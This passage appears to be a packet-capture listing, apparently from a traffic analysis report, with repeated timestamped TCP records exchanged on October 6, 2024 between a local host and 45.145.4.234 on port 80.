                                                                                                                                                Oct 6, 2024 22:18:42.828986883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829009056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829168081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829178095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829189062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829200029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829209089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829211950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829221964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829233885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829237938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829246998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829253912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829257965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829271078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829279900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829305887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829725981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829737902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829749107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.829771996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.829787016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830101013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830111980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830121994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830132008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830142975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830142975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830154896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830167055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830168009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830179930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830189943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830194950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830202103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830213070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830213070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830224991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830228090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830244064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830266953 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830897093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830909014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830920935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830930948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830941916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830945969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830954075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830965042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830974102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830984116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.830985069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.830996990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831007004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831016064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831018925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831029892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831037045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831053019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831075907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831785917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831798077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831808090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831819057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831829071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831835985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831840992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831852913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831861019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831865072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.831888914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.831904888 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.832304955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832315922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832326889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832338095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832348108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832350969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.832360029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832366943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.832372904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.832382917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.832410097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:43.193578959 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:43.198615074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:43.402278900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:43.402434111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:43.494059086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:43.498939991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:43.685909986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:43.689451933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:44.913258076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:44.918164015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.103535891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.103652954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.511538982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.516550064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687707901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687731028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687741041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687779903 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.687815905 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.687829018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687840939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687851906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.687872887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.687891006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.688760996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.688807964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.688816071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.688824892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.688854933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.688870907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.688932896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.688949108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.688987017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.689011097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.689021111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.689043999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.689065933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.689090967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.689125061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.689218044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.689229012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.689254999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.689268112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.770827055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.770858049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.770869017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.770901918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.770915985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.770939112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.770946980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.770997047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.771018028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771028996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771055937 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.771075964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.771122932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771158934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.771224976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771235943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771265984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.771311045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771351099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.771411896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771424055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.771466970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772092104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772142887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772162914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772175074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772203922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772219896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772272110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772313118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772344112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772355080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772388935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772574902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772622108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772625923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772636890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772666931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772680998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772707939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772717953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772728920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772747993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772759914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772885084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772895098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772907019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.772932053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772948980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.772994041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.773046017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.773046970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.773056984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.773086071 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.773243904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.773293018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.773324966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.773336887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.773364067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.773379087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.855566025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855581045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855606079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855617046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855627060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855633974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855658054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855667114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.855834007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.855834007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.855998039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856054068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856066942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856081963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856116056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856251001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856332064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856333971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856350899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856384039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856398106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856719017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856781960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856784105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856796026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856847048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856847048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856853008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856864929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856909037 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856937885 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.856946945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.856992006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857103109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857151985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857165098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857177019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857207060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857222080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857244968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857254028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857287884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857295990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857306004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857342958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857428074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857479095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857503891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857515097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857558966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857583046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857630014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857639074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857650995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857690096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857742071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857786894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857795000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857798100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857820988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857856989 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857872009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857875109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857920885 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.857944965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857956886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.857989073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858015060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858026028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858078003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858113050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858124018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858165026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858198881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858201981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858246088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858256102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858319044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858335018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858366013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858397961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858409882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858475924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858475924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858485937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858541012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858556986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858572006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858598948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858619928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858722925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858772039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858788013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858798981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858855009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858856916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858869076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858905077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.858939886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858951092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.858989000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.859033108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859045029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859080076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.859102011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859147072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.859153986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859198093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.859246016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859257936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859267950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.859293938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.859303951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.951172113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951195002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951210022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951356888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951354027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.951374054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951397896 CEST806388545.145.4.234192.168.2.6
